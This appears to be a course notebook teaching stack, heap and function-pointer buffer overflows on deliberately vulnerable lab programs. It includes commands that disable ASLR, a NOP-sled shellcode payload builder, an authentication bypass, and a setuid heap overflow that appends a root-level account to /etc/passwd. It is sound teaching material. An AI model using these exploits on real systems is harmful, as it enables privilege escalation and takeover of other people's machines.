# Buffer Overflows
- most Internet worms use buffer overflow vulnerabilities to propagate
- C and C++ assume that programmers are responsible for data integrity
- modern compilers and OSes provide various protections making it harder to exploit traditional buffer overflows
- once the buffer is allocated, there's no built-in mechanism to safeguard the amount of data that can be stored into to
    - this is called buffer overrun or buffer overflow
    - user data may overwrite other part of the memory it's not supposed to making the program behave differently or crashing the program
    - hackers could take advantage of this flaw to control the program and may pawn the system by executing shellcode or payload of their choice
- buffer overflow can violate all three core principles of **CIA** triad - **Confidentiality, Integrity, and Availability**
- **Confidentiality**: allows attackers to read confidential or data that they're not supposed to have access to
- **Integrity**: allows attackers to modify part of the data/program that they're not supposed to
- **Availability**: allows attackes to crash the system (SEGFAULT) violating availbility of the service

- typically two types:
    1. stack overflow
    2. heap overflow

## Disable ASLR and other compiler protections
- compile.sh script disables compiler protections

In [ ]:
# if value is 0; ASLR is disabled
! cat /proc/sys/kernel/randomize_va_space

In [ ]:
# run this on terminal
# can't interactively type sudo password!
! echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

## Stack Overflow
- overrun in stack segment
- let's use some programs to demonstrate stackoverflow

## Some consequences of stack overflow

1. overwrite variable(s) with the data of your choice (Integrity)
- change the flow of the program (Integrity)
- remote code execution (Integrity, Confidentiality, Availability)

### 1. overwrite variables with the data of your choice
- demo program: booksrc/overflow_example.c

In [50]:
# let's looks at the content of overlfow_example.c
! cat booksrc/overflow_example.c

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]) {
	int value = 5;
	char buffer_one[8], buffer_two[8];

	strcpy(buffer_one, "one"); /* put "one" into buffer_one */
	strcpy(buffer_two, "two"); /* put "two" into buffer_two */
	
	printf("[BEFORE] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);
	printf("[BEFORE] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);
	printf("[BEFORE] value is at %p and is %d (0x%08x)\n", &value, value, value);

	printf("\n[STRCPY] copying %d bytes into buffer_two\n\n",  strlen(argv[1]));
	strcpy(buffer_two, argv[1]); /* copy first argument into buffer_two */

	printf("[AFTER] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);
	printf("[AFTER] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);
	printf("[AFTER] value is at %p and is %d (0x%08x)\n", &value, value, value);
}


### draw stack of main to answer the following questions
- what is the order of the variables pushed?
- when argv[1] is copied to buffer_two, what may happen to other variables?
- compile and run the program with some arguments

In [51]:
! ./compile.sh booksrc/overflow_example.c overflow_example.exe

In [52]:
! ./overflow_example.exe
# segfault is bad!! provide some argument

[BEFORE] buffer_two is at 0xffffd19c and contains 'two'
[BEFORE] buffer_one is at 0xffffd1a4 and contains 'one'
[BEFORE] value is at 0xffffd1ac and is 5 (0x00000005)
Segmentation fault


In [53]:
# run the program providing some argument
! ./overflow_example.exe hello

[BEFORE] buffer_two is at 0xffffd19c and contains 'two'
[BEFORE] buffer_one is at 0xffffd1a4 and contains 'one'
[BEFORE] value is at 0xffffd1ac and is 5 (0x00000005)

[STRCPY] copying 5 bytes into buffer_two

[AFTER] buffer_two is at 0xffffd19c and contains 'hello'
[AFTER] buffer_one is at 0xffffd1a4 and contains 'one'
[AFTER] value is at 0xffffd1ac and is 5 (0x00000005)


In [56]:
# try a few some other values like 15 As and observe!
! ./overflow_example.exe $(perl -e 'print "A"x15')

[BEFORE] buffer_two is at 0xffffd18c and contains 'two'
[BEFORE] buffer_one is at 0xffffd194 and contains 'one'
[BEFORE] value is at 0xffffd19c and is 5 (0x00000005)

[STRCPY] copying 15 bytes into buffer_two

[AFTER] buffer_two is at 0xffffd18c and contains 'AAAAAAAAAAAAAAA'
[AFTER] buffer_one is at 0xffffd194 and contains 'AAAAAAA'
[AFTER] value is at 0xffffd19c and is 5 (0x00000005)


In [59]:
# try 16As and notice the int value variable
! ./overflow_example.exe $(perl -e 'print "A"x16 . "BCDE"')

[BEFORE] buffer_two is at 0xffffd18c and contains 'two'
[BEFORE] buffer_one is at 0xffffd194 and contains 'one'
[BEFORE] value is at 0xffffd19c and is 5 (0x00000005)

[STRCPY] copying 20 bytes into buffer_two

[AFTER] buffer_two is at 0xffffd18c and contains 'AAAAAAAAAAAAAAAABCDE'
[AFTER] buffer_one is at 0xffffd194 and contains 'AAAAAAAABCDE'
[AFTER] value is at 0xffffd19c and is 1162101570 (0x45444342)


- try to overwrite int value variable with "BCDE"
- how may bytes is value away from buffer_two?
- find the difference between the address of value and buffer_two

In [ ]:
# subtract the address of buffer_two from the address of value
# which variable is at higher location?
! echo $((0xffffd19c - 0xffffd18c))

In [60]:
# now try overwriting value with BCDE
! ./overflow_example.exe $(perl -e 'print "A"x16 . "BCDE"')
# check if BCDE is in that order...
# remember x86 is little-endian, i.e., smaller byte is stored first

[BEFORE] buffer_two is at 0xffffd18c and contains 'two'
[BEFORE] buffer_one is at 0xffffd194 and contains 'one'
[BEFORE] value is at 0xffffd19c and is 5 (0x00000005)

[STRCPY] copying 20 bytes into buffer_two

[AFTER] buffer_two is at 0xffffd18c and contains 'AAAAAAAAAAAAAAAABCDE'
[AFTER] buffer_one is at 0xffffd194 and contains 'AAAAAAAABCDE'
[AFTER] value is at 0xffffd19c and is 1162101570 (0x45444342)


In [62]:
# check the hex values with python; also see the values of buffer_two and buffer_one
chr(int('42', 16))
# B is stored at the end!

'B'

In [61]:
# try one more time; using hex values of EDCB
! ./overflow_example.exe $(perl -e 'print "A"x16 . "\x45\x44\x43\x42"')

[BEFORE] buffer_two is at 0xffffd18c and contains 'two'
[BEFORE] buffer_one is at 0xffffd194 and contains 'one'
[BEFORE] value is at 0xffffd19c and is 5 (0x00000005)

[STRCPY] copying 20 bytes into buffer_two

[AFTER] buffer_two is at 0xffffd18c and contains 'AAAAAAAAAAAAAAAAEDCB'
[AFTER] buffer_one is at 0xffffd194 and contains 'AAAAAAAAEDCB'
[AFTER] value is at 0xffffd19c and is 1111704645 (0x42434445)


### 2. change the flow of the program
#### e.g. authenticate without using actual password
- use ./booksrc/auth_overflow.c program as demo
- let's see the contents fo auth

In [63]:
! cat ./booksrc/auth_overflow.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int check_authentication(char *password) {
	int auth_flag = 0;
	char password_buffer[16];

	strcpy(password_buffer, password);
	
	if(strcmp(password_buffer, "brillig") == 0)
		auth_flag = 1;
	if(strcmp(password_buffer, "outgrabe") == 0)
		auth_flag = 1;

	return auth_flag;
}

int main(int argc, char *argv[]) {
	if(argc < 2) {
		printf("Usage: %s <password>\n", argv[0]);
		exit(0);
	}
	if(check_authentication(argv[1])) {
		printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
		printf("      Access Granted.\n");
		printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
	} else {
		printf("\nAccess Denied.\n");
   }
}
	


In [64]:
# let's compile booksrc/auth_overflow.c
! ./compile.sh ./booksrc/auth_overflow.c auth_overflow.exe

In [65]:
# run the program; gives help
! ./auth_overflow.exe

Usage: ./auth_overflow.exe <password>


In [71]:
# authenticate with password, outgrabe
! ./auth_overflow.exe outgrabe


-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-


In [98]:
# authenticate with password, brillig
! ./auth_overflow.exe brillig


-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-


In [100]:
# anyother password shouldn't work!
! ./auth_overflow.exe letmein


Access Denied.


### let's authenticate without real password

In [72]:
# Let's provide 16 As as password
! ./auth_overflow.exe $(perl -e 'print "A"x16')


Access Denied.


In [101]:
# how about 17 As
! ./auth_overflow.exe $(perl -e 'print "A"x17')


-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-


### draw stack of check_authentication( ) to understand why 17As let's you in

### examine stack using gdb-peda
- run the program in GDB to see the address of auth_flag relative to that of password_buffer
- peda will show address of both password_buffer and auth_flag in stack context

```bash
$ ./gdb -q auth_overflow.exe
$ break check_authentication
$ run $(perl -e 'print "A"x20')
$ next i
$ x/s password_buffer
$ x/x &auth_flag
$ p/a &password_buffer
$ p/d auth_flag
```

##### can you overflow if the variable declaration orders are switched?
- compile and examine booksrc/auth_overflow2.c
- draw stack
- verify it using GDB

In [75]:
# let's see the source code of booksrc/auth_overflow2.c
! cat ./booksrc/auth_overflow2.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int check_authentication(char *password) {
	char password_buffer[16];
	int auth_flag = 0;

	strcpy(password_buffer, password);
	
	if(strcmp(password_buffer, "brillig") == 0)
		auth_flag = 1;
	if(strcmp(password_buffer, "outgrabe") == 0)
		auth_flag = 1;

	return auth_flag;
}

int main(int argc, char *argv[]) {
	if(argc < 2) {
		printf("Usage: %s <password>\n", argv[0]);
		exit(0);
	}
	if(check_authentication(argv[1])) {
		printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
		printf("      Access Granted.\n");
		printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
	} else {
		printf("\nAccess Denied.\n");
   }
}
	


In [76]:
# let's compile the program
! ./compile_bash.sh booksrc/auth_overflow2.c auth_overflow2.exe

In [77]:
# run the program with 17As
! ./auth_overflow2.exe $(perl -e 'print "A"x17')


-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-


### well how is it possible?
- see in gdb where auth_flag is compared to password_buffer
- turns out auth_flag is still at higher address (pushed before) compared to password_buffer
- compile optimization? (I don't have clear answer to why!)
- if auth_flag is in lower address compared to password_buffer, you can't overwrite it by oveflowing password_buffer
- see Hacking textbook

### control return to the right block to authenticate  
- overflow the return address to bypass check_authentication() condition in main and directly execute the true block
- possible in older gcc/assembly version (Hacking LiveCD)
- couldn't get it to work on newer system (tested on Kali (4-19-0)!
- let's assemble and look at the return instruction...
- repeated instructions add esp, 0x10 and sub esp, 0xc makes it hard to jump into the righ instruction

### can return to printf("    access granted     ")
- find the address add esp, 0x10 before the addres to "access granted"
- use that address to overwrite the return address with
- find the offset from password_buffer to return address (32 bytes)
    - subtract the the address of password_buffer from the address of return address
    - or use gdb peda
    
```bash
- $pattern arg 100 # create a pattern of 100 and set as the argument
- $run the program until segfault
- $patts # see EIP offset which is the return address

```

## 3. Remote code execution
- inject and execute shellcode
- shellcode is a program that gives you shell on the system
- we'll use a vulnerable program booksrc/stackoverflowdemo.c

In [109]:
# let's look at the source of stackoverflowdemo.c
# program simply copies and echoes user provided argument
! cat booksrc/stackoverflowdemo.c

#include <stdio.h>
#include <string.h>

void bad(char *data) {
    char buffer[64];
    strcpy(buffer, data);
    puts(buffer);
}

int main(int argc, char **argv) {
    bad(argv[1]);
    return 0;
}

In [104]:
# let's compile and execute the program
! ./compile.sh booksrc/stackoverflowdemo.c stackoverflowdemo.exe

In [108]:
! ./stackoverflowdemo.exe "hello world!"

hello world!


### exploit stackoverflow vulnerability
#### code execution
- create an exploit code
- exploit code typically has the following structure:
```
repeated nop sled | exploit code | repeated return address
```
- **nop sled**: \x90 no operation instruction
- **exploit code**: shell code, local or remote, tcp connect, reverse connect
- **repeated return address** - address pointing to some address of repeated nop sled is stored in buffer
- provide the exploit code to the vulnerable program as an argument
- for now simply use provided exploit code; later learn how to generate your own exploit code
- the exploit code is in booksrc/exploit_stackoverflow.py

In [112]:
#  let's look at the exploit code written in Python 2
! cat booksrc/exploit_stackoverflow.py

#!/usr/bin/env python2
#
# Template for local argv exploit code, generated by PEDA
#
import os
import sys
import struct
import resource
import time

def usage():
    print "Usage: %s target_program" % sys.argv[0]
    return

def pattern(size=1024, start=0):
    try:
        bytes = open("pattern.txt").read(size+start)
        return bytes[start:]
    except:
        return "A"*size

def nops(size=1024):
    return "\x90"*size

def int2hexstr(num, intsize=4):
    if intsize == 8:
        if num < 0:
            result = struct.pack("<q", num)
        else:
            result = struct.pack("<Q", num)
    else:
        if num < 0:
            result = struct.pack("<l", num)
        else:
            result = struct.pack("<L", num)
    return result

i2hs = int2hexstr

def list2hexstr(intlist, intsize=4):
    result = ""
    for value in intlist:
        if isinstance(value, str):
            result += value
        else:
            result += int2hexstr(value, intsize)
    return result



In [ ]:
# before you execute the exploit code; you must know the return address
# of the payload that's copied into the stack somewhere in buffer[]

### how was the exploit_stackoverflow.py generated?

### using GDB-PEDA
- create pattern and use as an agrument to the program
    - gdb -q ./stackoverflowdemo.exe
    - pattern arg 200
    - run 
    - after program crashes run
    - patts or pattern search
    - look for EIP.and note the EIP offset
        - ..found at offset [#] that's the total offset  where return address (including retrun address) is from the overflown buffer's base address 
- generate skeleton exploit code using GDB-PEDA
    - skeleton argv exploit_stackoverflow.py
- create local linux shellcode 
    - shellcode generate x86/linux exec

## Using bash to exploit stackoverflowdemo.exe
- create payload buffer with shellcode
    - 48 bytes nop sleds + shellcode (24 bytes) + return address (4 bytes)
- run program with the payload
    - `$ ./stackoverflowdemo.exe $(cat payloadFile)`

In [78]:
%%bash
payloadFile=./booksrc/stackoverflowpayload.bin
perl -e 'print "\x90"x48' > $payloadFile
cat ./booksrc/shellcodex86linuxexec >> $payloadFile
perl -e 'print "\x34\xf1\xff\xbf"' >> $payloadFile
# check the size of the file
echo "$payloadFile Size in bytes"
wc -c $payloadFile

./booksrc/stackoverflowpayload.bin Size in bytes
76 ./booksrc/stackoverflowpayload.bin


### notesearch has stackoverflow vulnerability
- booksrc/notesearch.c

- compile.sh notesearch.c notesearch.exe
- `./notesearch.exe $(perl -e 'print '"A"x60')`

### exploit_notesearch.c is a complete exploit program that exploits stackoverflow in notesearch
- ./compile.sh exploit_notesearch.c exploit_notesearch.exe
- ./exploit_notesearch.exe
- run the provided exploit_notesearch.sh script to determine the offset
    - change the range if you still do not get the shell

## Heap Overflow
- buffer overflow can happen in other segments such as **heap** and **bss**
- if an important variable is located after a buffer vulnerable to an overflow, the program's control flow can be altered (regardless of the memory segment)
    - controls may be limited
- not standarized as stack overflow but can be just as effective

### booksrc/notetaker.c is susceptible to heap overflow
```strcpy(buffer, argv[1]); // problem!
```

In [96]:
! cat booksrc/notetaker.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include "hacking.h"

void usage(char *prog_name, char *filename) {
   printf("Usage: %s <data to add to %s>\n", prog_name, filename);
   exit(0);
}

void fatal(char *);            // a function for fatal errors
void *ec_malloc(unsigned int); // an errorchecked malloc() wrapper

int main(int argc, char *argv[]) {
   int userid, fd; // file descriptor
   char *buffer, *datafile;

   buffer = (char *) ec_malloc(100);
   datafile = (char *) ec_malloc(20);
   strcpy(datafile, "/var/notes");

   if(argc < 2)                // If there aren't commandline arguments
      usage(argv[0], datafile); // display usage message and exit

   strcpy(buffer, argv[1]);  // copy into buffer

   printf("[DEBUG] buffer   @ %p: \'%s\'\n", buffer, buffer);
   printf("[DEBUG] datafile @ %p: \'%s\'\n", datafile, datafile);

 // Opening the file
   fd = open(datafile, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);


In [97]:
# let's compile notetaker.c
! compile.sh ./booksrc/notetaker.c notetaker.exe

/bin/sh: 1: compile.sh: not found


### notetaker.exe must be setuid root program 
- all users in the system can take their own notes by writing to /var/notes file

```
$ sudo chown root:root notetaker.exe
$ sudo chmod u+s notetaker.exe
```

In [80]:
%%bash
ls -al ./booksrc/notetaker.exe

-rwxr-xr-x 1 user user 10748 Apr 20 14:43 ./booksrc/notetaker.exe


In [81]:
%%bash
./booksrc/notetaker.exe "new notefor user"

[DEBUG] buffer   @ 0x804b1a0: 'new notefor user'
[DEBUG] datafile @ 0x804b210: '/var/notes'


[!!] Fatal Error in main() while opening file: Permission denied


CalledProcessError: Command 'b'./booksrc/notetaker.exe "new notefor user"\n'' returned non-zero exit status 255.

In [82]:
%%bash
./booksrc/notetaker.exe $(perl -e 'print "A"x112')

[DEBUG] buffer   @ 0x804b1a0: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
[DEBUG] datafile @ 0x804b210: ''


[!!] Fatal Error in main() while opening file: No such file or directory


CalledProcessError: Command 'b'./booksrc/notetaker.exe $(perl -e \'print "A"x112\')\n'' returned non-zero exit status 255.

In [83]:
%%bash
./booksrc/notetaker.exe $(perl -e 'print "A"x112 . "testfile"')

double free or corruption (out)
bash: line 1: 15700 Aborted                 ./booksrc/notetaker.exe $(perl -e 'print "A"x112 . "testfile"')


CalledProcessError: Command 'b'./booksrc/notetaker.exe $(perl -e \'print "A"x112 . "testfile"\')\n'' returned non-zero exit status 134.

In [84]:
%%bash
ls -al testfile

-rw------- 1 user user 126 Apr 20 14:43 testfile


In [85]:
%%bash
cat testfile

�  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtestfile


## Exploit the heap-overflow flaw in notetaker program
- several clever ways to exploit this type of capability
- append a user to the /etc/passwd file?
- make a backup copy of the file just incase...

In [86]:
%%bash
cp /etc/passwd /tmp/passwd.bkup

In [87]:
%%bash
cat /tmp/passwd.bkup

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Networ

## /etc/passwd file format

username:password:userid:groupid:User Info:home folder:default shell
- x : hashed password stored in /etc/shadow file
- the password field can contain hashed password
- Perl crypt() function uses same function used by system to hash password

In [88]:
%%bash
perl -e 'print crypt("password", "AA")'

AA6tQYSfGxd/A

In [89]:
%%bash
perl -e 'print crypt("password", "XX")'

XXq2wKiyI43A2

## goal: genarate a entry that looks like

`letmein:XXq2wKiyI43A2:0:0:me:/root:/bin/bash`

### problem:
- it's hard to generate the exact line ending with /bin/bash
    - the file name /etc/passwd will be automatically attached at the end

### workaround:
- make /etc/passwd a soft link pointing to /bin/bash

In [90]:
%%bash
mkdir /tmp/etc
ln -s /bin/bash /tmp/etc/passwd

In [91]:
%%bash
ls -l /tmp/etc/passwd

lrwxrwxrwx 1 user user 9 Apr 20 14:44 /tmp/etc/passwd -> /bin/bash


### now we've a valid password entry that looks like:

`letmein:XXq2wKiyI43A2:0:0:me:/root:/tmp/etc/passwd`

#### one more thing:
- the value just before /etc/passwd must be 112 bytes long, remember?
- can play with user information column to adjust the length


In [92]:
%%bash
# find the length with empty user info
echo -ne letmein:XXq2wKiyI43A2:0:0::/root:/tmp | wc -c

37


In [93]:
%%bash
echo $((112-37))

75


In [94]:
%%bash
perl -e 'print "letmein:XXq2wKiyI43A2:0:0:" . "A"x75 . ":/root:/tmp"' | wc -c

112


In [95]:
%%bash
./booksrc/notetaker.exe $(perl -e 'print "letmein:XXq2wKiyI43A2:0:0:" . "A"x75 . ":/root:/tmp/etc/passwd"')

[DEBUG] buffer   @ 0x804b1a0: 'letmein:XXq2wKiyI43A2:0:0:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:/root:/tmp/etc/passwd'
[DEBUG] datafile @ 0x804b210: '/etc/passwd'


[!!] Fatal Error in main() while opening file: Permission denied


CalledProcessError: Command 'b'./booksrc/notetaker.exe $(perl -e \'print "letmein:XXq2wKiyI43A2:0:0:" . "A"x75 . ":/root:/tmp/etc/passwd"\')\n'' returned non-zero exit status 255.

In [ ]:
%%bash
tail /etc/passwd

## now login or su letmein with password

## BSS Segment, Function Pointer Overflow
### Game of Chance program
- three different game functions
    - uses a single global function pointer to remember last game played
- uses global struct object in BSS segment to hold plyayer's info
- seteuid multi-user program that stores user's data in /var folder

- compile game_of_chance.c
- change ownership to root:root
- seteuid
- run and play game
- player.name buffer is 100 bytes
- input_name() copies data to player.name until \n
- play_the_game function can take advantage of the overflown function pointer when any game is 
- put the game to background - ctrl+z
- find the difference between player.name address and player.current_game (100)
- return to the suspended program: fg
- enter 5 to change name
- change name to 100As+BBBB+\n
- play the same game and see the DEBUG
- find valid address to overwrite current_game func ptr
- list symbols in object/binary (nm)
    - nm game_of_chance.exe
- automate/simulate the game play
- $ perl -e 'print "1\n10\nn\n5\n" . "A"x100 . "jackpot address in rev order" . "1\n" . "y\n"x10 . 
"n\n5\nJohn Doe\n7"' | ./game_of_chance